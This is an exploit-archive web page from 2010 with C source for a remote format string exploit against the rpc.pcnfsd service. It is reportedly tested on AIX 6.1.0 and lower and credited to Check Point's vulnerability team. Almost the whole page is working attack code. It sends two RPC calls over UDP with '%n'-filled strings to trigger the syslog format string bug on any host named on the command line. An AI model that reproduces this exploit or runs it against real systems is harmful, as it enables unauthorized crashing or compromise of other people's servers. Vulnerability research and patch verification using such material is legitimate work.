rpc.pcnfsd Remote Format String Exploit
Posted on 18 July 2010
<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>rpc.pcnfsd Remote Format String Exploit</title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>======================================= rpc.pcnfsd Remote Format String Exploit ======================================= /************************************************************************* * Check Point Software Technologies - Vulnerability Discovery Team (VDT) * * Rodrigo Rubira Branco - <rbranco *noSPAM* checkpoint.com> * * * * rpc.pcnfsd syslog format string vulnerability * *************************************************************************/ #include <stdlib.h> #include <stdio.h> #include <string.h> #include <unistd.h> #include <rpc/rpc.h> #define PCNFSD_PROG 150001 #define PCNFSD_VERS 1 #define PCNFSD_PR_INIT 2 #define PCNFSD_PR_START 3 struct cm_send { char *s1; char *s2; }; struct cm_send2 { char *s1; char *s2; }; struct cm_reply { int i; }; bool_t xdr_cm_send(XDR *xdrs, struct cm_send *objp) { if(!xdr_wrapstring(xdrs, &objp->s1)) return (FALSE); if(!xdr_wrapstring(xdrs, &objp->s2)) return (FALSE); return (TRUE); } bool_t xdr_cm_send2(XDR *xdrs, struct cm_send2 *objp) { if(!xdr_wrapstring(xdrs, &objp->s1)) return (FALSE); if(!xdr_wrapstring(xdrs, &objp->s2)) return (FALSE); return (TRUE); } bool_t xdr_cm_reply(XDR *xdrs, struct cm_reply *objp) { if(!xdr_int(xdrs, &objp->i)) return (FALSE); return (TRUE); } int main(int argc, char *argv[]) { long ret, offset; int len, x, y, i; char *hostname, *b; CLIENT *cl; struct cm_send send; struct cm_send2 send2; struct cm_reply reply; struct timeval tm = { 10, 0 }; enum clnt_stat stat; printf("-= rpc.pcnfsd remote format string exploit, tested against AIX 6.1.0 and lower =- "); printf("-= Check Point Software Technologies - Vulnerability Discovery Team (VDT) =- "); printf("-= Rodrigo Rubira Branco <rbranco *noSPAM* checkpoint.com> =- "); if(argc < 2) { printf("Usage: %s [hostname] ", argv[0]); exit(1); } hostname = argv[1]; send.s1 = "AAAA%n%n%n%n%n%n%n%n%n"; // Create the dir on /var/spool/pcnfs send.s2 = ""; send2.s1 = "AAAA%n%n%n%n%n%n%n%n%n";// Call the dir to trigger fmt bug send2.s2 = ""; printf(" Sending PCNFSD_PR_INIT to the server ... "); if(!(cl=clnt_create(hostname,PCNFSD_PROG,PCNFSD_VERS,"udp"))){ clnt_pcreateerror(" error");exit(-1); } stat=clnt_call(cl, PCNFSD_PR_INIT, xdr_cm_send, (caddr_t) &send, xdr_cm_reply, (caddr_t) &reply, tm); clnt_destroy(cl); printf("done! "); printf("Sending PCNFSD_PR_START procedure ... "); if(!(cl=clnt_create(hostname,PCNFSD_PROG,PCNFSD_VERS,"udp"))){ clnt_pcreateerror(" error");exit(-1); } cl->cl_auth = authunix_create("localhost", 0, 0, 0, NULL); stat=clnt_call(cl, PCNFSD_PR_START, xdr_cm_send2, (caddr_t) &send2, xdr_cm_reply, (caddr_t) &reply, tm); printf("done! "); clnt_destroy(cl); } # <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-07-18]</pre><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>
